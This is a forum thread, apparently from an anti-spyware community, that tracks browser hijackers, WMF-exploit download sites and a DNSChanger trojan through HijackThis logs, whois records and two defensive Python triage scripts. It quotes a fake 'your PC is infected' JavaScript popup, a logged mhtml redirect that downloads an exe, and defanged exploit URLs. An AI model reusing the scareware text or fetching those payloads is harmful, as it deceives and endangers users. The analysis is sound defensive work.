R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.quicknavigate.com/search.php?qq=%1
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.quicknavigate.com/search.php?qq=%1
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://www.quicknavigate.com/


------


oneclicksearches.com

oneclicksearches.com - 69.50.180.155

[ shares the same IP as ns2.quicknavigate.com ]

Creation Date: 24-May-2005
Expiration Date: 24-May-2006


Searchmaid.com copy site with the stealthSWs114.h!dll spyware hoax popups:

http://www.webhelper4u.com/CWS/Research/sc...idinfected.html



QUOTE
script name=' JavaScript '
var answer = confirm ('Attention! \r\rYor PC is infected with spyware.\r\rBrowser version: ' + navigator.appVersion + '\r Spyware details: \"stealthSWs114.h!dll\" ver.4.442as18a.\raccess port:#33299 \r\rWarning!\r Your private data or information ( Credit Card numbers, any adresses, contacts etc.)\r may be used by malefactors in some criminal actions. \r\r\rClick \"OK\" button to get list of available AntiSpyware products.'); if (answer)
window.location = 'java/search.php?qq=spyware'
script


-------

Moore
2 domains found on 69.50.166.74

www.Clicksearchclick.com
www.Daoclick.com

Domain name: clicksearchclick.com

Registrant Contact:
Atlantics Cons S/A
A Jordan
+44.81877188
Fax: none
188 Lakeville drive
London, KSX 1889
GB

Domain name: daoclick.com

Registrant Contact:
Atlantics Cons S/A
A Jordan
+44.81877188
Fax: none
188 Lakeville drive
London, KSX 1889
GB

QUOTE
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.clicksearchclick.com/
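The HijackThis excerpts quoted in these posts show the two shapes this family of hijack takes: R0/R1 entries rewriting the IE start, search and search-assistant settings to the hijacker's search.php, and O16 Downloaded Program File entries whose source is an mhtml:/file:// URL rather than a plain http download (the MHTMLRedir trick in the dedialer.com post). The script below is an added example, not code from the thread, that triages a HijackThis log for those patterns. The indicator list is built from hosts named in this thread and the root-directory autorun heuristic is mine; the sample log lines are quoted from logs posted here, defanging (hxxp/hzzp) left intact.

```python
"""Triage HijackThis R/O/F lines for browser-hijacker patterns (added example)."""
import re
from urllib.parse import urlparse

# Hosts the hijacked settings and DPF entries in this thread point at. Extend as needed.
HIJACKER_HOSTS = {
    "qfind.net", "startsearches.net", "updatesearches.com", "quicknavigate.com",
    "oneclicksearches.com", "clicksearchclick.com", "205.252.161.238",
}

LINE_RE = re.compile(r"^(?P<type>[A-Z]\d{1,2}) - (?P<body>.*)$")
URL_RE = re.compile(r"(?:h[xz]{2}p|https?|file|mhtml)\s*:\s*//?\S+", re.I)
EXE_RE = re.compile(r"[A-Za-z]:\\.*?\.exe", re.I)
ROOT_EXE_RE = re.compile(r"[a-z]:\\(windows\\)?[^\\]+\.exe")   # C:\foo.exe or C:\WINDOWS\foo.exe
IPV4_RE = re.compile(r"(\d{1,3}\.){3}\d{1,3}")


def host_of(url):
    """Hostname of a possibly defanged URL; hxxp/hzzp are read as http."""
    url = re.sub(r"^h[xz]{2}p\s*:\s*/+", "http://", url, flags=re.I)
    try:
        return (urlparse(url).hostname or "").lower()
    except ValueError:
        return ""


def registrable(host):
    """www.qfind.net -> qfind.net; IPs and short names unchanged (deliberately crude, no PSL)."""
    parts = host.split(".")
    if IPV4_RE.fullmatch(host) or len(parts) < 3:
        return host
    return ".".join(parts[-2:])


def triage(lines):
    """Return (entry type, reason, line) for each HijackThis line matching a hijacker pattern."""
    findings = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        typ, body, line = m["type"], m["body"], raw.strip()
        hosts = sorted({registrable(host_of(u)) for u in URL_RE.findall(body)})
        if typ in ("R0", "R1", "R3"):
            for h in hosts:
                if h in HIJACKER_HOSTS:
                    findings.append((typ, "IE start/search setting points at hijacker host " + h, line))
        elif typ == "O16":
            low = body.lower()
            if "mhtml" in low or re.search(r"file\s*:", low):
                findings.append((typ, "Downloaded Program File sourced via mhtml:/file: instead of http", line))
            for h in hosts:
                if h in HIJACKER_HOSTS:
                    findings.append((typ, "DPF fetched from hijacker host " + h, line))
        elif typ in ("O4", "F3"):
            # Heuristic: autoruns living directly in C:\ or C:\WINDOWS, or registered via win.ini run=
            exe = EXE_RE.search(body)
            if exe and (typ == "F3" or ROOT_EXE_RE.fullmatch(exe.group(0).lower())):
                findings.append((typ, "autorun executable in a root directory or win.ini run=", line))
    return findings


# Lines quoted from logs posted in this thread (plus one clean R0 line for contrast).
SAMPLE_LOG = r"""
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.qfind.net/search.php?qq=%s
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hzzp://www.startsearches.net/bar.html
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O16 - DPF: {11111111-1111-1111-1111-111111111111} - mhtml : file : //C : NXSFT.MHT ! hxxp ://205.252.161.238:80/iex/ofile.exe?url= hxxp://205.252.161.238:80/rdgDE1393.exe
O16 - DPF: {11111111-1111-1111-1111-511111113457} - file://c:\x.cab
O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe
O4 - HKLM\..\Run: [SystemLoader] C:\WINDOWS\sysldr32.exe
O4 - HKCU\..\Run: [Windows installer] C:\winstall.exe
F3 - REG:win.ini: run=C:\WINDOWS\System32\vxgame3.exe
""".strip().splitlines()


if __name__ == "__main__":
    for typ, reason, line in triage(SAMPLE_LOG):
        print(f"[{typ}] {reason}\n      {line}")
```

The O16 check is the important one: a legitimate DPF entry is an http(s) download of a signed CAB, so a source of mhtml: or file:// means the page used the local-zone redirect rather than an ordinary download. The root-directory autorun rule is only a triage hint (a few legitimate tools, RegRun's winbait.exe among them, also live in C:\WINDOWS), so confirm each hit against the file itself.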
Moore
Been a while since we had any posts in this thread...


.wmf Exploit hijack sites:

http://www.microsoft.com/technet/security/...n/ms06-001.mspx
http://www.f-secure.com/weblog/archives/archive-122005.html
http://sunbeltblog.blogspot.com/2005/12/ne...ly-patched.html

http://isc.sans.org/diary.php?storyid=997


1st .wmf exploit hit from:
hxxp://63.246.144.140/123.wmf

2nd hit from:
hxxp://game4all.biz/adv/049/xpl.wmf

===============================

Both called an Inhoster server (the whole IP range is in the spyware blocklist):

hxxp://85.255.113.10/?to=nan44&from=in

hxxp://85.255.113.22/inc/nan44.html

QUOTE
85.255.112.0 - 85.255.127.255
Inhoster hosting company



=====
1:
=====

hxxp://63.246.144.140/
hxxp://63.246.144.140/123.wmf

QUOTE
63.246.144.140
sakura.ctgameinfo.com
63.246.144.140 - 63.246.144.149
Konstantin Chibrikov
Kotowskogo 5-52
Smolensk
Postal Code: 214027
Russian Federation

FTP - 21 220 ProFTPD 1.3.0rc3 Server (ProFTPD Default Installation) [63.246.144.140]

HTTP - 80 HTTP/1.1 200 OK
Date: Fri, 27 Jan 2006 19:59:39 GMT
Server: Apache/1.3.34 (Unix) PHP/4.4.1 mod_ssl/2.8.25 OpenSSL/0.9.7d
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html



reverse dns for sakura.ctgameinfo.com = 216.55.190.209

QUOTE
1 domains found on 216.55.190.209 :

www.Logonvine.com

216.55.128.0 - 216.55.191.255
Abacus America Inc



=====
2:
=====

game4all.biz = 217.107.217.184

QUOTE
217.107.217.184
217.107.217.128 - 217.107.217.191

Co-location and dedicated service
Moscow, Russia
Russian Federation

Anatoliy Voronin
BesTTest HardWare Lab.
125364, Moscow, Russia
Norilskaya str., 13A


Spam blacklist details:
http://www.whois.sc/rbl/?ip=217.107.217.184

=================================


File harvest from hxxp://85.255.113.10/?to=nan44&from=in

I had to kill all the vxgame.exe processes, which were running as red X's in the systray and bogging the system down too much, then made a HijackThis log.

Yes, my system date is Nov 2005 on purpose.

QUOTE
Logfile of HijackThis v1.99.1
Scan saved at 9:44:05 PM, on 11/4/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\VMware\VMware Tools\VMwareService.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\VMware\VMware Tools\VMwareTray.exe
C:\Program Files\VMware\VMware Tools\VMwareUser.exe
C:\Program Files\Common Files\Acronis\Schedule\schedule.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\Hotkeycontrol XP\hkcontrol.exe
C:\Program Files\Ad Muncher\AdMunch.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\PROGRA~1\Greatis\REGRUN~1\WatchDog.exe
C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
C:\Program Files\GhostSurf 2005\Proxy.exe
C:\Program Files\Sysinternals\ProcessExplorerNt\procexp.exe
C:\Program Files\CaptureWiz\Pro\CaptureWiz.exe
C:\Program Files\2xexplorer\2xExplorer\2xExplorer.exe
C:\System Tools\hijackthis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = file:///C:/Documents%20and%20Settings/spywarekiller/My%20Documents/homepage/ShareTheFiles%20-%20SeK%AEeT%20liNKs%A9.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = hxxp://www.adware-free-security.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:7212
F3 - REG:win.ini: run=C:\WINDOWS\System32\vxgame3.exe
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - (no file) [coolwebsearch?]
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\Program Files\FlashGet\jccatch.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O3 - Toolbar: Net Snippets - {67970B26-F57D-4455-8262-81C3AE3B8B5E} - C:\PROGRA~1\NETSNI~1\NetSnip.dll
O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe
O4 - HKLM\..\Run: [VMware User Process] C:\Program Files\VMware\VMware Tools\VMwareUser.exe
O4 - HKLM\..\Run: [RegRun WinBait] C:\WINDOWS\winbait.exe
O4 - HKLM\..\Run: [@RegRunOnSecure] C:\PROGRA~1\Greatis\REGRUN~1\OnSecure.exe
O4 - HKLM\..\Run: [Acronis Schedule] "C:\Program Files\Common Files\Acronis\Schedule\schedule.exe"
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKLM\..\Run: [Hotkeycontrol] C:\Program Files\Hotkeycontrol XP\hkcontrol.exe
O4 - HKLM\..\Run: [GhostSurfDelSatellite] C:\Program Files\GhostSurf 2005\DeleteSatellite.exe
O4 - HKLM\..\Run: [Ad Muncher] C:\Program Files\Ad Muncher\AdMunch.exe /bt
O4 - HKLM\..\Run: [System] C:\WINDOWS\System32\kernels64.exe
O4 - HKLM\..\Run: [igfxsrvs] C:\WINDOWS\System32\igfxsrv.exe
O4 - HKLM\..\Run: [SystemLoader] C:\WINDOWS\sysldr32.exe
O4 - HKLM\..\Run: [xp_system] C:\WINDOWS\System32\vxgame3.exe
O4 - HKLM\..\Run: [Microsoft Office] C:\WINDOWS\System32\msvcp.exe
O4 - HKLM\..\RunServices: [SystemTools] C:\WINDOWS\System32\kernels64.exe

O4 - HKCU\..\Run: [Regrun2] C:\PROGRA~1\Greatis\REGRUN~1\regrun2.exe /c 1
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Windows installer] C:\winstall.exe
O4 - HKCU\..\Run: [pro] C:\WINDOWS\System32\vxh8jkdq2.exe
O4 - HKCU\..\Run: [xp_system] C:\WINDOWS\System32\vxgame3.exe

O4 - Startup: c-program files-filemap by bb v405-bootalert.LNK = C:\Program Files\FileMap By BB v405\Bootalert.exe
O4 - Startup: Outpost Firewall.lnk = C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
O8 - Extra context menu item: Add to Net Snippets - C:\PROGRA~1\NETSNI~1\Res\Clipper.htm
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Snippets - {7130DF06-BBC1-4e16-83D4-1F875E65B695} - C:\PROGRA~1\NETSNI~1\NetSnip.dll
O9 - Extra button: HttpWatch - {D103E85B-5D67-42c1-8C83-F01079DBAB26} - C:\Program Files\HttpWatch\httpwtch.dll
O9 - Extra 'Tools' menuitem: HttpWatch - {D103E85B-5D67-42c1-8C83-F01079DBAB26} - C:\Program Files\HttpWatch\httpwtch.dll
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\flashget.exe
O9 - Extra button: SmartWhois - {FD9DE2B4-C926-4460-81C4-FC58C6F1062E} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O9 - Extra button: (no name) - {FF983118-58C7-4AD4-B5A7-691C39CB7B42} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O9 - Extra 'Tools' menuitem: SmartWhois - {FF983118-58C7-4AD4-B5A7-691C39CB7B42} - C:\PROGRA~1\SMARTW~1\SWMSIE~1.EXE
O12 - Plugin for .bcf: C:\Program Files\Internet Explorer\Plugins\NPBelv32.dll
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O20 - AppInit_DLLs: C:\PROGRA~1\Agnitum\OUTPOS~1\wl_hook.dll
O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: ewido security suite control - ewido networks - C:\Program Files\ewido\security suite\ewidoctrl.exe
O23 - Service: ewido security suite guard - ewido networks - C:\Program Files\ewido\security suite\ewidoguard.exe
O23 - Service: VMware Tools Service (VMTools) - VMware, Inc. - C:\Program Files\VMware\VMware Tools\VMwareService.exe



QUOTE
*****************************
COMPARING RECORDS FROM  WINDOWS
*****************************
-----------------------------
sysldr32.exe
-----------------------------
*****************************
*****************************
COMPARING RECORDS FROM C:\ ROOT
*****************************
-----------------------------
boot.inx
lo-24810218.exe
winstall.exe
-----------------------------
*****************************
COMPARING RECORDS FROM SYSTEM32
*****************************
-----------------------------
kernels64.exe
maxd64.exe
mspostsp.exe
msupdate32.dll
msvcp.exe
netsh.exe
paradise.raw.exe
qvxgamet2.exe
qvxgamet3.exe
qvxgamet4.exe
svcp.csv
vx.tll
vxgame1.exe
vxgame2.exe
vxgame3.exe
vxgame4.exe
vxgame6.exe
vxgamet1.exe
vxgamet2.exe
vxgamet3.exe
vxgamet4.exe
vxh8jkdq1.exe
vxh8jkdq2.exe
vxh8jkdq5.exe
vxh8jkdq6.exe
vxh8jkdq7.exe
winsub.xml
-----------------------------
*****************************


Created folder :
QUOTE
C:\WINDOWS\inet20004\*
        = services.exe


c:\windows\temp\pay4.tmp.exe

C:\winstall.exe
C:\WINDOWS\System32\vxgame3.exe
C:\WINDOWS\System32\kernels64.exe
C:\WINDOWS\System32\igfxsrv.exe
C:\WINDOWS\System32\vxh8jkdq2.exe
C:\WINDOWS\System32\vxgame3.exe
C:\WINDOWS\sysldr32.exe


Outbound connection by vxgame6.exe [spambot?] on smtp/port 25 to:

QUOTE
208.36.123.14
spf7-19.us4.outblaze.com
208.36.123.0 - 208.36.123.255
Outblaze, Limited
10 Marshall Street
Old Greenwich
CT
06870
United States



C:\WINDOWS\System32\msvcp.exe
http://www.sophos.com/virusinfo/analyses/trojagenthy.html

C:\WINDOWS\system32\msupdate32.dll
C:\WINDOWS\system32\mspostsp.exe

http://www.sophos.com/virusinfo/analyses/trojjupdropb.html


couldn't locate C:\WINDOWS\System32\igfxsrv.exe or pay4.tmp.exe



=================

Domains/IPs involved:

sakura.ctgameinfo.com 63.246.144.140
game4all.biz = 217.107.217.184


hxxp://85.255.113.10/

85.255.112.0 - 85.255.127.255
Inhoster hosting company


hxxp://httphost1/trial.php?rest=0&ver=16249104&a=00000002 69.50.175.178
hxxp://69.50.173.166/

69.50.173.166
69.50.160.0 - 69.50.191.255
InterCage, Inc

-

hxxp://evko.biz/

66.235.180.23
evko.biz
66.235.160.0 - 66.235.191.255
HopOne Internet Corporation
1010 Wisconsin Avenue N.W.
Washington
DC

-

hxxp://72.36.244.185/

72.36.244.185
blackhatz.info
72.36.244.129 - 72.36.244.255
Internet Technologies Ltd
IP Management Department
Saint Petersburg
Russian Federation

-

hxxp://www.crystalysmedia.com/

209.8.60.8
www.crystalysmedia.com
209.8.0.0 - 209.9.255.255
Beyond The Network America, Inc.
Reston Executive Center

-

hxxp://core.psyche-evolution.com/

64.62.171.238
core.psyche-evolution.com
McColo Corporation

-

hxxp://krostagur.info/
hxxp://buhartes.info/
hxxp://fantastar.info/

216.255.187.66
buhartes.info
216.255.176.0 - 216.255.191.255
InterCage, Inc.

-

hxxp://webfastlink-us.com/mafia/

81.31.34.130
webfastlink-us.com
81.31.32.0 - 81.31.35.255
Master Internet s.r.o.
Czech Republic

-

hxxp://69.50.161.106/

hxxp://badgirlspink.com/
hxxp://banners.geotarget.info/
hxxp://banners.sexsearch.com/
hxxp://ads.adultfriendfinder.com/
hxxp://banners.adultfriendfinder.com/
hxxp://graphics.adultfriendfinder.com/
hxxp://www.spicymovies.com/sex.gif
hxxp://sex.com/
Moore
downloader trojan ..

REFERER hxxp://zlex.org/per/?ct=lan

hxxp://zlex.org/per/jara.jar
hxxp://zlex.org/per/cura.anr
hxxp://zlex.org/per/aAnima.class

85.255.115.227
zlex.org

Reverse IP: Web server hosts 2 websites
Server Type: Apache/1.3.34 (Unix) PHP/4.4.0
IP Address: 85.255.115.227
IP Location: - Inhoster Hosting Company

2 domains found on 85.255.115.227

www.Zlex.org
www.2youx.net


Domain ID:D111609078-LROR
Domain Name:ZLEX.ORG

Created On:13-Jan-2006 20:23:14 UTC
Last Updated On:14-Jan-2006 12:14:16 UTC
Expiration Date:13-Jan-2007 20:23:14 UTC

Sponsoring Registrar:Direct Information PVT Ltd. (R27-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:DI_1651225
Registrant Name:A Bronson
Registrant Organization:N/A
Registrant Street1:15001 Tyler St
Registrant City:Miami
Registrant State/Province:Florida
Registrant Postal Code:331767642
Registrant Country:US

---

Domain Name: 2YOUX.NET

Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias ()
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660

Creation Date: 01-Feb-2006
Expiration Date: 01-Feb-2007

Domain servers in listed order:
ns1.zlex.org
ns2.zlex.org




85.255.112.0/20 is listed on the Spamhaus Block List (SBL)

QUOTE
19-Jan-2006 15:18 GMT | SR04

DNSChanger Trojan home

http://vil.mcafeesecurity.com/vil/content/v_136602.htm

Symptoms

* Presence of the file:
o %SYSTEMROOT%\SYSTEM32\HGQHP.EXE
* Having DNS entries in any of your network adaptors with the values:
o 85.255.112.132
o 85.255.113.13
* Finding traffic targeting:
o 195.95.218.100

______

DNS also @85.255.114.36

[85.255.112.132] spbg9.mydomain.com
[85.255.113.13] mercury.xhpro.com
[85.255.114.36] dns12.esthost.com
[195.95.218.100] annyme.esthost.com

________

AS | IP | AS Name
26627 | 85.255.112.0 | AS-PILOSOFT - Pilosoft, Inc.

AS | IP | AS Name
27595 | 85.255.113.0 | INTERCAGE - InterCage, Inc.

AS | IP | AS Name
27595 | 85.255.114.0 | INTERCAGE - InterCage, Inc.

AS | IP | AS Name
27595 | 85.255.115.0 | INTERCAGE - InterCage, Inc.
________


inetnum: 85.255.112.0 - 85.255.127.255
netname: inhoster
descr: Inhoster hosting company
descr: OOO Inhoster, Poltavskij Shliax 24, Kharkiv, 61000, Ukraine
country: UA

inetnum: 195.95.218.0 - 195.95.219.255
netname: ESTHOST
descr: Inhoster hosting company

_____
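As an added example (not code from the thread), a small Python triage script for two things the thread does by hand: it parses HijackThis lines in the format posted above and flags the autostart and hook entries (F3, O4, O20) whose file is among those the directory comparison lists as newly created, and it checks a list of adapter DNS servers against the 85.255.112.0/20 and 195.95.218.0/23 ranges tied to the DNSChanger entries. The sample lines and the file subset are constructed from this thread's own listings; the function and variable names are my own.

```python
import ipaddress
import re
from pathlib import PureWindowsPath

# Constructed sample lines in the HijackThis format posted in the thread (not a live capture)
SAMPLE_LOG = r"""
F3 - REG:win.ini: run=C:\WINDOWS\System32\vxgame3.exe
O4 - HKLM\..\Run: [VMware Tools] C:\Program Files\VMware\VMware Tools\VMwareTray.exe
O4 - HKLM\..\Run: [Acronis Schedule] "C:\Program Files\Common Files\Acronis\Schedule\schedule.exe"
O4 - HKLM\..\Run: [System] C:\WINDOWS\System32\kernels64.exe
O4 - HKLM\..\Run: [Ad Muncher] C:\Program Files\Ad Muncher\AdMunch.exe /bt
O4 - HKCU\..\Run: [Windows installer] C:\winstall.exe
O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll
"""

# Subset of the files the thread's directory comparison reports as newly created
NEW_FILES = {"winstall.exe", "kernels64.exe", "vxgame3.exe", "msupdate32.dll", "sysldr32.exe"}

# Ranges the thread ties to the DNS hijack (Inhoster SBL listing and ESTHOST)
LISTED_NETS = [ipaddress.ip_network("85.255.112.0/20"), ipaddress.ip_network("195.95.218.0/23")]

LINE_RE = re.compile(r"^(?P<kind>[A-Z]\d+) - (?P<body>.*)$")
# First drive-letter path ending in an executable or library extension; quotes and trailing arguments are ignored
PATH_RE = re.compile(r'"?([A-Za-z]:\\[^"]*?\.(?:exe|dll|ocx))"?', re.IGNORECASE)

def parse_line(line):
    """Return (kind, path) for a HijackThis line, or None if it names no file."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    p = PATH_RE.search(m.group("body"))
    return (m.group("kind"), p.group(1)) if p else None

def flag_entries(log_text, new_files=NEW_FILES):
    """List (kind, path) for every entry whose file name is in new_files (case-insensitive)."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed and PureWindowsPath(parsed[1]).name.lower() in new_files:
            hits.append(parsed)
    return hits

def suspicious_dns(servers, nets=LISTED_NETS):
    """Return the DNS server addresses that fall inside the listed ranges, in input order."""
    return [s for s in servers if any(ipaddress.ip_address(s) in n for n in nets)]

if __name__ == "__main__":
    print(flag_entries(SAMPLE_LOG))
    print(suspicious_dns(["85.255.112.132", "8.8.8.8", "195.95.218.100"]))
```

Feed it the full log from a suspect machine and the complete list of new files from a before/after directory comparison; entries for known tools (VMware, Acronis, Ad Muncher) drop out because their files are not in the new-file set.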
Moore
QUOTE
SECURITYNETCENTER.COM

Website Title:  Error Detected
Response Code:  200
SSL Cert:  No valid SSL on this Host, Get Secure
Server Type:  Apache/1.3.34 (Unix) PHP/4.3.11

IP Address:  88.208.0.79
IP Location:   - Haldex Ltd
Blacklist Status:  Clear
Record Type:  Domain Name

inetnum:        88.208.0.0 - 88.208.31.255
netname:        HALDEX-NET
descr:          Haldex Ltd.
country:        UA
admin-c:        SIY-RIPE
tech-c:         SIY-RIPE
status:         ASSIGNED PA
mnt-by:         HALDEX-MNT
mnt-lower:      HALDEX-MNT
mnt-routes:     HALDEX-MNT
source:         RIPE # Filtered

person:         Yuriy Syvolotskyy
address:        Avtoparkova st. 7
address:        Kiev, Ukraine
phone:          +3 8 044 4657255
e-mail:         ripe@advancedhosters.com
nic-hdl:        SIY-RIPE
source:         RIPE # Filtered
Michoko
Hi everyone

I suggest you check this IP's domain too. It has attempted to portscan my system several times within a day, so...

196.206.120.223
JeanInMontana
Hello, I came across this thread doing a Google search for this domain BesTTest HardWare Lab from here:

inetnum: 81.177.3.0 - 81.177.3.255
netname: BESTTEST-RU
descr: besTTest - HW lab,
descr: Moscow, Russia
country: RU
admin-c: AV1919-RIPE
tech-c: AV1919-RIPE
status: ASSIGNED PA
notify: *******@besttest.ru
notify: ***@rtcomm.ru
mnt-by: AS8342-MNT
changed: ****@rt.ru 20040916
source: RIPE

person: Anatoliy Voronin
address: BesTTest HardWare Lab.
address: 125364, Moscow, Russia
address: Norilskaya str., 13A
e-mail: *****@besttest.ru
e-mail: ******@allforum.ru
remarks: phone: +7 095 5447337
phone: +7 495 5447337
remarks: fax-no: +7 095 5447337
fax-no: +7 495 5447337
notify: *****@besttest.ru
nic-hdl: AV1919-RIPE
changed: ****@rt.ru 20040714
changed: ****@rt.ru 20040915
changed: ****@rt.ru 20041110
source: RIPE
remarks: modified for Russian phone area changes
changed: ********@ripe.net 20051216

% Information related to '81.176.0.0/15AS8342'

route: 81.176.0.0/15
descr: RTCOMM-RU
origin: AS8342
notify: ***@rtcomm.ru
mnt-by: AS8342-MNT
changed: ***@rt.ru 20030120
changed: ***@rt.ru 20031105
changed: ***@rt.ru 20040809
source: RIPE

This site was in a new user profile at my site http://leforum.ru/ and the IP 81.177.3.211 led me to the rest. What a tangled web we weave.